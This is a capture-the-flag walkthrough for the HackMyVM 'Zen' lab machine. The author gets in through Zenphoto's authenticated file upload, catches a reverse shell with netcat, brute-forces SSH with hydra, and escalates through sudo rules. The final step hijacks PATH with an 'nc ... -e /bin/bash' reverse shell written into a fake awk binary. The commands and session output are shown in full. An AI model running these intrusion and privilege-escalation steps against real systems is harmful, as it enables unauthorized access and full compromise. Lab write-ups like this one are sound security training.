HackMyVm Zen Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Zen
Scan ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
| 256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
|_ 256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
80/tcp open http nginx 1.14.2
| http-robots.txt: 9 disallowed entries
| /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
|_/zp-data/ /page/search/ /uploaded/ /backup/
|_http-server-header: nginx/1.14.2
|_http-title: Galer\xC3\xADa
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel From main page, get the app name and version number.
```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->
Google the zenphoto version 1.5.7, we know it has upload vulnerability.
Authenticated arbitrary file upload to RCEProduct : Zenphoto
Affected : Zenphoto CMS - <= 1.5.7
Attack Type : Remote
login then go to plugins then go to uploader and press on the check box elFinder
then press apply , after that you go to upload then Files(elFinder) drag and drop
any malicious php code after that go to /uploaded/ and you're php code
Zenphoto through 1.5.7 is affected by authenticated arbitrary file
upload, leading to remote code execution. The attacker must navigate to
the uploader plugin, check the elFinder box, and then drag and drop
files into the Files(elFinder) portion of the UI. This can, for
example, place a .php file in the server's uploaded/ directory.
[Reference]
https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
https://twitter.com/3almisfer
https://github.com/azizalshammari/
From robots.txt, found a strange string: P@ssw0rd.
Find the login panel of zenphoto at /zp-core/admin.php, login with admin:P@ssw0rd.
Upload a php shell and get reverse shell.
```bash
& kali @ mykali in ~/Documents/zen 0 [13:57:14]
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:38120.
Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
20:23:18 up 16 min, 0 users, load average: 0.00, 0.02, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
────────────────────────────────────────────────────────────────────────────────────────────────────────
& kali @ mykali in ~/Documents/zen 0 [14:05:51]
~ curl http://192.168.56.99/backup/r.phpFound 3 users in home folder.
www-data@zen:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 Jun 14 03:45 .
drwxr-xr-x 18 root root 4096 Jun 14 03:19 ..
drwxr-xr-x 2 hua hua 4096 Jun 14 03:45 hua
drwxr-xr-x 2 kodo kodo 4096 Jun 14 03:24 kodo
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14 03:47 zenmasterBecause we can found no way to escalate to anyone of these 3 users, so we can only bruteforce ssh credentials.
~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F ...
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: zenmaster password: zenmasterLogin as zenmaster, escalate to kodo.
```bash
enmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p
As user kodo, check sudo -l. Use the edit function, and press !:/bin/bash, escalate to user
```bash
kodo@zen:/home/zenmaster$ sudo -l
Matching Defaults entries for kodo on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kodo may run the following commands on zen:
(hua) NOPASSWD: /usr/bin/see
kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
hua@zen:/home/zenmaster$ id
uid=1002(hua) gid=1002(hua) groups=1002(hua)Check sudo -l.
```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
We can write to /use/local/bin.
```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null
...
/tmp/.X11-unix
/usr/local/bin
/usr/lib/systemd/system/mountnfs-bootclean.service
...Use strace to track add-shell, it calls awk, cat, rm from /usr/local/bin, which don't exist.
```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory
Then we can write a shell code in awk, and get root shell.
```bash
hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
hua@zen:/tmp$ chmod +x /usr/local/bin/awk
hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
────────────────────────────────────────────────────────────────────────────────────────────────────────
& kali @ mykali in ~ 0 [15:25:33]
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:38124.
id;hostname
uid=0(root) gid=0(root) groups=0(root)
zen